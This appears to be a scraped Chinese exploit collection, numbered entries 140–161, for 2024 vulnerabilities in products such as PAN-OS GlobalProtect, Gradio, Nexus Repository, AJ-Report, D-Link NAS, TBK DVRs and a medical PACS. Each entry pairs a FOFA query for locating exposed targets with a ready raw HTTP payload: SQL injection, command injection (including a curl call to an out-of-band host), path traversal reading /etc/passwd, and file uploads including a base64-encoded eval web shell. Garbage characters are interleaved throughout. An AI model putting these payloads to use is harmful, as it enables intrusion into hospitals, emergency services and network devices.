$ l6 @1 l& x* r. x* oHost: x.x.x.x
/ l7 r* N+ R4 P. LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* w' L2 R2 F# v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) o8 @* m4 G0 U& R6 n6 x( OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 H$ }+ s. p1 B) G; m) oAccept-Encoding: gzip, deflate, br! R- z( ?& I( }: {2 V
Connection: close
4 m: y" ~7 j! t' a/ ?Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk, }" C% a6 X( \9 F' H
Upgrade-Insecure-Requests: 1: z- w D8 g+ _! h; O/ F
: B' K+ K3 ~! |) S
0 x! j* ^- a9 T+ B- |+ c- v0 R140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入8 E5 \ X% T$ z s% q1 @
CVE-2024-2566: S' U8 Z F+ F4 _* N0 G
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% W% b, }$ V8 D4 `GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1; C+ g& Y. R( D1 q1 Q
Host: x.x.x.x
1 C$ _) Y# r O% y, n8 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 `5 P! ]( C) w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. Y* P9 g! S9 ]4 n s5 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 Y1 X; a! _* \$ TAccept-Encoding: gzip, deflate, br$ q( @2 y8 z1 q( p0 W" J
Connection: close3 k4 t- i% X( V" N1 c
Cookie: authcode=h8g93 K9 _2 A) K. [
Upgrade-Insecure-Requests: 1; L V9 U8 ~4 {- b% u% X( q: E6 d$ o
3 o! X G8 l" N* W+ h$ x, e% ?6 I; k% v
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入. `, D+ f" Q) A3 A3 E# q' s
FOFA:body="指挥调度管理平台"
8 L) P9 F# {+ h! F, M' DPOST /app/ext/ajax_users.php HTTP/1.1
9 O0 b6 p; l9 v6 K: S# ^+ Z) nHost: your-ip
+ J3 S4 u. K1 E+ L& }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+ L: y9 ?8 _# S9 U9 m; qContent-Type: application/x-www-form-urlencoded
! H+ y& e5 w8 P$ k+ X
+ h* p# R" [) g! d; @% ?- s) |. T! b
; U$ w: b5 J2 M6 K( Z) Ldep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
/ R; r0 j/ B7 @. J$ e
' g) a K' ?: z* ^: |+ H, }8 e* t
3 v$ b9 k) o: m- d; k) d1 b: ?" m' O142. CMSV6车辆监控平台系统中存在弱密码0 S8 N4 Z# u O) R% g
CVE-2024-29666
" q X* R; G: K8 i( _FOFA:body="/808gps/". _: |& S4 V: ?7 l2 G: ]6 r
admin/admin* U! ~9 g( o8 Q: Y8 g
143. Netis WF2780 v2.1.40144 远程命令执行% {5 ?" X* U6 r. @4 h( L2 v
CVE-2024-25850: Z2 X) j( D" v/ `# A# V( E) `- V
FOFA:title='AP setup' && header='netis'1 {; y, K, m" }- u
PAYLOAD7 q. X7 a4 B* _" r: P3 O( M, e
! z" \9 J' [2 B6 U0 @3 L. D144. D-Link nas_sharing.cgi 命令注入
0 Q4 k N- |3 | eFOFA:app="D_Link-DNS-ShareCenter"6 U- x' C5 g4 ]/ s( b$ Q
system参数用于传要执行的命令
# F9 [+ g* I5 C, ]GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
5 k# P3 z0 l& W; dHost: x.x.x.x, w G/ ]2 u# i0 U7 n+ I
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0! P" r' s5 M! _( p: W* B5 t
Connection: close6 s$ [% f) G# D$ L8 z, V9 e
Accept: */*
) b: o$ w8 h% {* I0 J" w! W/ _4 rAccept-Language: en+ E! o2 s: Y) a- M b5 u
Accept-Encoding: gzip" [- q1 m: R( I2 R) V! s q
2 N" S9 T# r$ u8 N7 ^ U6 X; D7 ?* ]3 p6 Z, L
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入- w0 d$ `. V: E) A
CVE-2024-3400* t' A8 \7 x1 C$ f h1 [
FOFA:icon_hash="-631559155") y8 m$ L* b' h5 w7 Y, T, c0 c2 K' s
GET /global-protect/login.esp HTTP/1.1! ?) |1 z( T1 F7 c8 z8 \8 V
Host: 192.168.30.112:10051 B7 i* ?2 U6 j! g, h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
0 s- r2 J* q; D5 s' r# A& Q' cConnection: close
4 i1 p' L# _* xCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
7 W- a6 p) i$ D( E8 F% v" @Accept-Encoding: gzip# \* t+ j! J+ o N
; ]. ~/ X) g' O% Y2 Z
; a! m* ^$ \9 B' ~- s7 h3 T2 T146. MajorDoMo thumb.php 未授权远程代码执行
( Z! \3 m- O. o8 X6 D& sCNVD-2024-02175
3 T6 P$ J, t& S6 jFOFA:app="MajordomoSL"3 Y3 K, g4 R$ f4 l$ s, e5 T* C
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1+ b0 V6 e R" }- O9 m4 ^
Host: x.x.x.x) \0 L' F: Z1 J$ I; p' f% p7 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84! U) c8 I' `+ y& S& e1 `/ K
Accept-Charset: utf-8
- j7 [2 o8 f, Q! a4 R6 KAccept-Encoding: gzip, deflate5 V% X6 ^) `! N2 {; H
Connection: close
/ u+ o- T) _- ]: q7 k6 ?1 L; q) v
# G3 q+ R/ h4 v# r5 v F147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
; `1 a/ Q8 T* S. h7 C1 p( E9 DCVE-2024-323997 o' z9 P |0 T/ k+ d7 W
FOFA:body="RaidenMAILD"
4 _) k& g, N0 D! Y# _* M: P3 n7 I4 HGET /webeditor/../../../windows/win.ini HTTP/1.1
$ s+ v+ G/ y/ S% THost: 127.0.0.1:81
* i2 _2 L W; M$ F% K5 CCache-Control: max-age=05 ~$ _& p; |. N- L
Connection: close+ k& b, i( g/ d' r$ s! K8 ?
E L2 `' \4 Q) s e3 N/ ~" N0 E5 V, a6 J1 R7 y J T I5 U# M
148. CrushFTP 认证绕过模板注入
& b2 D+ T& ~( Q- b- fCVE-2024-4040' v; s8 E% N M
FOFA:body="CrushFTP" A! }8 C& x6 b- S+ q$ {. Z* N
PAYLOAD
2 i6 \& S4 W# k6 A
: o0 ~( O7 F/ b9 _8 [149. AJ-Report开源数据大屏存在远程命令执行
# @! i* X4 U8 m; ?FOFA:title="AJ-Report"8 [5 b" C/ s4 w$ F" h' U
/ g/ E& h8 P2 G9 ?! t
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% t/ K' e! P2 |9 a9 f- f* KHost: x.x.x.x t" b, J. r' a E4 _ r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 w$ c* D& a" S- P; s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 N1 m% f3 E) R2 B
Accept-Encoding: gzip, deflate, br9 @( N+ U: K4 u
Accept-Language: zh-CN,zh;q=0.9
3 `/ X2 ~" P# [" PContent-Type: application/json;charset=UTF-8
- @/ C: {* j, V# P% j* A9 pConnection: close8 }+ K7 E* R4 C
* A2 H' \9 u3 S! c" Y( {) D{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
3 }9 t/ T7 N% S1 N- A
- P) A* U8 o2 T- S2 ]- O150. AJ-Report 1.4.0 认证绕过与远程代码执行
+ r0 D4 \# V. sFOFA:title="AJ-Report"
`8 l$ {$ j( A6 i4 O( }4 RPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
/ x7 Y) c' ^; C' \# ~: HHost: x.x.x.x
) r ]8 M) r! qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36' n/ x# b( h! B( }0 ?8 U' C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& B0 Q1 U' \7 n7 G* S0 bAccept-Encoding: gzip, deflate, br! ?* U/ ], v: J+ P0 y) Z3 F
Accept-Language: zh-CN,zh;q=0.9
X% ~6 g4 z* @4 C* XContent-Type: application/json;charset=UTF-8. w/ j+ t% Q% j2 h P% K$ l
Connection: close
) s% p6 `2 G" s$ BContent-Length: 339
3 v3 P1 v( a, U) B' a6 {0 \# {5 \4 @1 q# D% \5 d2 Z" e
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
4 }& K/ r* q) L5 \6 T( P+ [2 c7 S4 K4 D# b5 m' E
0 w w3 n; W. F0 @! S% s1 w151. AJ-Report 1.4.1 pageList sql注入
* u/ b$ {. W1 e& C# A; ]3 YFOFA:title="AJ-Report"7 a# `# S, H7 u# K7 O& [) y- N& V
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1& F; y' `8 j- X9 S' d, \' f8 x
Host: x.x.x.x$ q) b, j! @4 X* v+ t9 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# f2 t* _% b& z4 X9 rConnection: close
3 `# e; _3 O s; @1 a3 lAccept-Encoding: gzip
) E8 o- M8 ]; y. X" i8 i. q( y
2 d0 J7 s' x3 k# O! \3 O, B; K8 \0 k d5 s
152. Progress Kemp LoadMaster 远程命令执行
6 F! C1 w- y. R' j" pCVE-2024-1212
. [' q8 L$ A) YLoadMaster <= 7.2.59.2 (GA)) Z" Z# @) E; {3 i: X4 X
LoadMaster<=7.2.54.8 (LTSF)0 s9 Y: H3 L* M- a
LoadMaster <= 7.2.48.10 (LTS)
! _( Y W8 e6 p1 O$ @FOFA:body="LoadMaster"
) L9 o7 @$ j( W7 W9 q6 [/ mJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
5 c8 u" D2 n! p2 k. _' ~9 Y. ?GET /access/set?param=enableapi&value=1 HTTP/1.1
7 p- }0 o& b6 c/ w$ v% b, |8 sHost: x.x.x.x" D7 p8 K- ` l( I, a8 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1) B$ s1 I' ~& D; o
Connection: close
2 y* T9 a( J8 G% ]Accept: */*
! B Y) \* w& x- a. X7 DAccept-Language: en/ h3 f, Z$ |1 l7 P$ Q
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
; Y5 T! J! s7 B" ~6 SAccept-Encoding: gzip7 z7 l9 {0 n1 ]
3 e. o, ^+ y0 Q' v, l9 B
' O3 O, \5 e. A' A153. gradio任意文件读取
" n' B9 f$ H$ H; VCVE-2024-1561FOFA:body="__gradio_mode__"
u" v, B$ g9 i" O ^第一步,请求/config文件获取componets的id
. V) b; v0 [5 A( E) ihttp://x.x.x.x/config
) J. I6 r2 m; q1 o" T1 I, v! r& u" w+ u9 a
9 [% q5 f$ C. g' i3 q* z, @* d, l第二步,将/etc/passwd的内容写入到一个临时文件
6 d: I9 B5 z6 g/ T3 ^; fPOST /component_server HTTP/1.1! f0 M+ K( ~, H, L5 [) c& j
Host: x.x.x.x
' W1 n4 D6 ~: u( ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
( T* R! y F% c: j2 RConnection: close# L. O! g: N$ h- J2 l
Content-Length: 115) I; s8 c1 Z" F
Content-Type: application/json
Z: y, t+ V, F0 FAccept-Encoding: gzip
9 [ f8 [; X+ q1 J
/ v1 G1 i0 F: n- v* G{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}& T9 I' u) e. v0 M7 M
& i5 C! z6 n+ N; h# g8 O, k C+ g7 R8 v; ^! X P) A
第三步访问
9 S/ g2 Q i* D0 _, i3 a9 q' O) ] Thttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
9 |/ k( W1 g6 X: z- {. E
8 F. M2 ]" W, L* F @( x( }7 c8 H; E0 E$ W' {
154. 天维尔消防救援作战调度平台 SQL注入5 T2 f. y) T, t" D0 A
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
* v1 N P2 M0 d! j0 g2 D& @# @: WPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
( m' H0 f' p6 k" Z3 }Host: x.x.x.x: `' D ^ c: S
Content-Length: 106
* i# L! y, F( Z5 q/ r7 jCache-Control: max-age=0# x x) i7 ` r
Upgrade-Insecure-Requests: 1
) D" B+ ?7 F9 DOrigin: http://x.x.x.x
$ t1 I* A# b: i& IContent-Type: application/json- @* L$ B/ G: r; @9 p* v9 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) j c' |/ T0 E' I) h$ H+ T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; k: g4 C/ v% o7 N% G6 R5 N2 w+ y
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
! h* X' o/ O& i8 O" X; H* {6 c7 R/ bAccept-Encoding: gzip, deflate
2 m2 x, ?6 G) MAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Y, \. K2 Z/ g6 u" t( C7 k, s0 J6 y
Connection: close, N9 P; a5 {% F) S8 F- R7 `
6 j$ U8 t$ g3 _* x, i{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}& w2 A# x) f% K& o1 k" M+ f9 L5 ]
& z8 _% h9 D$ ~- j4 v
0 W( d& o6 B# S
155. 六零导航页 file.php 任意文件上传" Y* s3 M$ I, ?$ P/ d, Q
CVE-2024-349824 O: ~( F! @ o. ~5 a5 g9 z, z
FOFA:title=="上网导航 - LyLme Spage"* B; }' o+ w' w
POST /include/file.php HTTP/1.17 [% C% k, j# p" p# b" {2 }
Host: x.x.x.x/ K% K" `. M+ c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0/ k2 ~0 j& `) J8 v
Connection: close. t* N G1 N$ y5 ^/ q4 S/ o
Content-Length: 232/ o$ h$ V9 g0 Y7 R& w
Accept: application/json, text/javascript, */*; q=0.01
8 _) _8 [, D6 \& aAccept-Encoding: gzip, deflate, br
& ^( W8 ^! c# N' U1 J" sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% t1 S4 o- B. c0 `1 dContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f1 Z3 S6 O) c3 z) z/ c) ?! u6 C2 W
X-Requested-With: XMLHttpRequest
5 A! o4 ~: R8 W9 |8 x6 V5 \) v; m/ j3 z% w5 q" ^# x; }0 }8 O
-----------------------------qttl7vemrsold314zg0f7 ~# S8 z0 ]8 r1 B" S) \+ j9 r2 d
Content-Disposition: form-data; name="file"; filename="test.php") {+ h0 F3 }: a9 {; L( P
Content-Type: image/png
' c1 [$ f7 x& W, ~0 f/ b
9 ], g% K# |7 _ z- S<?php phpinfo();unlink(__FILE__);?>
; I A9 z7 X8 j2 ^1 I# P-----------------------------qttl7vemrsold314zg0f--
- n# B* Q, P% _, E9 I6 Y6 \: R6 R9 y- ?( G5 A) m6 q$ s% t
9 _/ [6 m5 P$ @: N8 @& Q) }访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php0 u7 J; z5 g/ T0 g& F! z
W5 h4 J+ H% j6 \0 r6 M156. TBK DVR-4104/DVR-4216 操作系统命令注入
3 Y( l o$ U2 B7 R; UCVE-2024-3721% C9 y& Q J% o+ @7 y
FOFA:"Location: /login.rsp"
4 C% c6 h' X8 R, l9 ^6 `7 M6 Y·TBK DVR-4104. X/ X2 V9 R' O1 ?5 w5 X
·TBK DVR-4216
8 ?; O e9 p8 `curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
# s. v2 @: i: M7 q. h
* |7 Y( e, }( {. y1 q( m
1 K6 ~4 D$ D; Y+ \% L0 M7 j4 cPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
- k) H0 g7 A7 s$ q! NHost: x.x.x.x. q7 ]3 e1 Y- Y. D) k
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" T0 a* {0 x1 @# I0 h
Connection: close4 \7 o, q3 j9 O0 a2 x/ X
Content-Length: 0 @! }0 H6 X* G
Cookie: uid=17 U+ t9 q# k' d& o
Accept-Encoding: gzip" e0 Q' S$ g2 S
) f$ p$ E) k4 W2 `3 I; T* F2 F% z- |& l s& e
157. 美特CRM upload.jsp 任意文件上传% M7 x R% ~: p8 @! E A
CNVD-2023-069711 X! {" v3 V3 d$ y1 _% J! P
FOFA:body="/common/scripts/basic.js"
L2 }& F( R; O4 Q: sPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
* r# V) u$ j9 O/ Y/ SHost: x.x.x.x
% |, ]) \. I- n" p0 v, J: [, R9 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
! n" [$ W# ?8 d: k8 Y3 f& ]9 g EContent-Length: 709 \# g$ C! v& l3 u9 @3 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 }5 n) A4 I# P* zAccept-Encoding: gzip, deflate5 i2 U/ O. W2 E: S
Accept-Language: zh-CN,zh;q=0.9+ v4 r2 z' y2 Y* k' b' ~2 a
Cache-Control: max-age=0
/ t' c$ [ d5 C) v$ yConnection: close
& H0 I" y1 y5 b( lContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN4 _& t. r5 G% a
Upgrade-Insecure-Requests: 1) g ^; ~/ F) n& _
2 @' h4 ?8 p, Q& Q+ L
------WebKitFormBoundary1imovELzPsfzp5dN
3 s3 k; R) K& M$ O, kContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"& ^2 A5 b0 n9 V/ y0 L
Content-Type: application/octet-stream. o! x0 B2 W, ^
X* g2 R0 o! t4 a
nyhelxrutzwhrsvsrafb
) V; W( v9 J: H. Y% ] \# r------WebKitFormBoundary1imovELzPsfzp5dN
- U4 C7 c) o0 K0 q& P0 w5 o* L0 P4 sContent-Disposition: form-data; name="key". Y% X! N- o9 D9 e7 R1 O
9 K% p: N8 |/ ~" s; o
null3 _, g0 z/ F, {" |: c
------WebKitFormBoundary1imovELzPsfzp5dN
* h }8 ^; l3 f ~! ~Content-Disposition: form-data; name="form"
3 j% ?* Z4 z! e3 {+ x; i5 W- l- d& P! M$ j; n2 p
null
3 h+ V) R; c* J ]------WebKitFormBoundary1imovELzPsfzp5dN( i" Y- S9 R( F" ?" U
Content-Disposition: form-data; name="field"
% Y& l; }: V: P" G
7 u ^! T* M! N, m) Lnull8 b% S+ C5 K6 p; {1 N& c
------WebKitFormBoundary1imovELzPsfzp5dN% X- t# v) v) z$ u( ~/ r+ N3 Q
Content-Disposition: form-data; name="filetitile"
+ C& L: ?4 c7 N$ F, E/ S9 C5 y) e% z# c; c5 K
null
% k" D: N8 d6 N% r7 o- t------WebKitFormBoundary1imovELzPsfzp5dN! ~1 v5 ]. A& P) g+ X" j, c3 Q6 U
Content-Disposition: form-data; name="filefolder"/ d, |! T+ \. o; O
# C' y: Q9 K) T8 b. C1 C; Z
null
5 B3 q% }2 Y% s------WebKitFormBoundary1imovELzPsfzp5dN--
l+ d: u: O Q* w& w+ Q9 y# v U: H! G3 |, e/ o/ `6 U$ C
; o# N- T1 a7 w& h3 n, E$ U4 nhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
0 a; G) H$ s9 i$ _0 r3 x0 g% K8 t/ C( b# A2 y
158. Mura-CMS-processAsyncObject存在SQL注入
: h5 y8 E. b1 h# Y: PCVE-2024-326400 ]% ^1 O" n# l- B# P( s, _4 N
FOFA:"Generator: Masa CMS"
( j; T* U# [, z/ tPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1! v5 c+ @8 i! b- I0 h
Host: {{Hostname}}
, Q, g7 N+ ~( N9 d) e2 }Content-Type: application/x-www-form-urlencoded
8 w2 a6 w4 F; q+ C
$ Z$ J% @, w' S* B+ R' S. Nobject=displayregion&contenthistid=x\'&previewid=1/ a T2 ], F: b3 ^
$ [# w) |2 Y8 @
V4 N3 C d U/ p w& Q
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
0 W. |, L! h' P$ U' `# sFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"); ^ ~- d$ ]* Q" s# U8 T+ _: A% l6 d
POST /webservices/WebJobUpload.asmx HTTP/1.1
" _ n- V$ ^" \! B# ]# I7 J! i' n; kHost: x.x.x.x
7 N3 F7 f. b! D) ~2 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36% O) e+ {, p, w! S2 V
Content-Length: 1080
3 y/ m) S7 r9 ]- j* ?: W( P+ QAccept-Encoding: gzip, deflate
6 x6 x+ n+ O( B3 R5 }, g2 |; XConnection: close
) a1 M) x7 G& \! R5 x% V' JContent-Type: text/xml; charset=utf-8; K6 B: u; C4 I, w$ |) V
Soapaction: "http://rainier/jobUpload"
0 a% b" i# N- L5 ^) i. @6 L
* }6 m, e7 ?( e( t# D<?xml version="1.0" encoding="utf-8"?>
5 ~2 d3 d! _8 O<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 j$ G6 y2 r5 R; a! f. l) R<soap:Body>" Z; p) U% f0 A4 c& l, ]/ C" Z
<jobUpload xmlns="http://rainier">! c9 n3 I. Y+ L4 l9 F8 h7 ~2 `
<vcode>1</vcode>& ]: ~6 h. X y3 k$ G4 E! S
<subFolder></subFolder>0 K/ v7 c7 B0 p3 N$ W
<fileName>abcrce.asmx</fileName>
0 T/ G" v) B4 G7 l( h. V( @<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>8 }- t) D' ]" b2 Z" ^0 v7 T+ M
</jobUpload>6 ?2 k% q7 U1 ?2 f+ S2 g5 I
</soap:Body>* @3 ?/ ^! E' A$ h: r* R
</soap:Envelope>2 `) Z: [2 A- i% E
! ?, @% k% a+ s$ p4 `9 c' a% c4 U# }4 { S4 p+ }' y T
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World"): f, h7 {1 w% a3 a
- [" n$ I" N* f- l9 k8 N
, d7 K3 V8 A) }3 k6 w+ {+ U160. Sonatype Nexus Repository 3目录遍历与文件读取% h# _3 @# Y) }. H$ n
CVE-2024-4956
7 L( Q5 }* l. T% \$ zFOFA:title="Nexus Repository Manager"
) p) P/ [2 k; c& g h3 p* ZGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+ r' N, [ ^9 \1 THost: x.x.x.x6 P! s7 X3 y1 D7 H4 K5 w
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
4 t; @: _5 m2 G, gConnection: close
: {, w7 i) p6 \/ b wAccept: */*
( S8 N, l9 z" }Accept-Language: en
: X% C+ ^- B7 ^Accept-Encoding: gzip
6 ?; D1 h- x- Z0 t# P' `
; R% c, W( }4 O# @" b0 A n% n j/ K# A7 U; K- `9 V8 W! l4 f% E
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
: r6 e$ I9 h# ~" n5 ]. Y! WFOFA:body="/KT_Css/qd_defaul.css"
3 G* N. e; Q) _ V% i* H% K第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密6 S1 A) E" o6 v, O" Q4 R
POST /Webservice.asmx HTTP/1.19 I- ^. G' }" b+ l3 I
Host: x.x.x.x
) j6 ]- |- x% ?4 j5 {6 n* jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
' n8 X& i, @2 T4 N+ [; j# eConnection: close
) ~% R! V3 M+ nContent-Length: 4459 g3 E% W* y% U
Content-Type: text/xml. M2 h$ W5 D: c, S$ V2 Z0 ^
Accept-Encoding: gzip% F$ p6 v+ P& Y* v/ G. e" g
5 B4 P) U: L1 ~7 P<?xml version="1.0" encoding="utf-8"?>
# g8 R1 i) c1 j1 \<soap:Envelope xmlns:xsi="1 ?9 r) Y" Z/ j3 \
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"4 [& F$ b c8 k: p- A5 `
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; s% v, \+ }+ H6 n; b1 E; a* x5 {<soap:Body># `# S4 z. M0 }
<UploadResume xmlns="http://tempuri.org/">
! e" d. I6 f# Q% S, K; y<ip>1</ip>
( A3 i7 `" p7 `+ z5 e<fileName>../../../../dizxdell.aspx</fileName>
, D' u) \. }' W! B& C<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow> r- _5 n7 P* o! U3 J
<tag>3</tag>
% S; @& X1 h% V* l( c4 _8 I</UploadResume>" z8 p. q. |8 d9 R& E7 r2 k0 \" ? O
</soap:Body>
